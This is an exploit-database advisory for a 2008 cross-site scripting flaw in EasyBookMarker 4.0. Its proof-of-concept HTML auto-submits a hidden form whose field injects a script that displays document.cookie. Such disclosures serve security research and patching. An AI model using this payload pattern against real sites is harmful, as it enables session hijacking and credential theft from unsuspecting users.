EasyBookMarker 4.0 - 'ajaxp_backend.php' Cross-Site Scripting

EDB-ID:

32087


Author:

Dr.Crash

Type:

webapps


Platform:

PHP

Date:

2008-07-21


source: https://www.securityfocus.com/bid/30304/info

EasyBookMarker is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

EasyBookMarker 4.0tr is vulnerable; other versions may also be affected. 

<html> <head></head> <body onLoad=javascript:document.form.submit()> <form action="http://www.example.com/zomplog/ajaxp_backend.php" method="POST" name="form"> <input type="hidden" name="rs" value="&#x22;&#x20; <script>alert(document.cookie)</script>"> </form> </body> </html>